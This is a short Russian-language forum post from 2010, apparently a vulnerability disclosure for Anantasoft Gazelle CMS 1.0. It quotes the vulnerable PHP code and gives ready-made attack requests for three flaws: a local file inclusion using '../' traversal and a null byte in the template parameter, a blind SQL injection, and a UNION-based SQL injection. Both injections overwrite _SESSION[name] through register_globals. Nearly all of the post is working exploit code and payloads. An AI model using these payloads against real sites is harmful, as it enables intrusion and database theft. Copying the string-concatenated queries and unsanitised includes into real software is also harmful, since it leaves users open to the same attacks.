09.05.2010, 22:35
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Anantasoft Gazelle CMS 1.0
LFI
need: mq=off
file: index.php
PHP код:
$templatepath = include_once("modules/template.php"); // retrieve the correct template
......
include_once($templatepath."/index.php"); // add the template
file:modules/template.php
PHP код:
if (isset($_GET) && isset($_GET["template"]) && $_GET["template"]) {
if ($admin == 1) {
return "../templates/".$_GET["template"];
} else {
return "templates/".$_GET["template"];
}
result:
Код:
GET /index.php?template=../../[local_file]%00
blind SQL-Injection
need: mq=off, rg=on
file: modules/login.php
PHP код:
if (isset($_SESSION["name"]) && $_SESSION["name"]) {
$users = mysql_query("SELECT name FROM ".$tableprefix."users WHERE name='".$_SESSION["name"]."'");
if (!mysql_fetch_array($users, MYSQL_ASSOC)) {
unset($_SESSION["name"]); // the user that somehow (2 website on same host using same session...) got logged in does not exist
}
result:
Код:
GET /index.php?_SESSION[name]=admin'+and+substring(version(),1,1)=5+--+
SQL-Injection
need: mq=off, rg=on
file:change.php
PHP код:
if (isset($_SESSION["name"]) && $_SESSION["name"]) {
$user = $_SESSION["name"]; // get user name to auto fill-in current user data
}
$q = mysql_query("select number, name, email, admin, active, showemail from ".$tableprefix."users where name='".$user."'");
result:
Код:
GET /change.php?_SESSION[name]=1'+union+select+1,version(),3,4,5,6+--+
Последний раз редактировалось .:[melkiy]:.; 09.05.2010 в 22:38..
|
|
|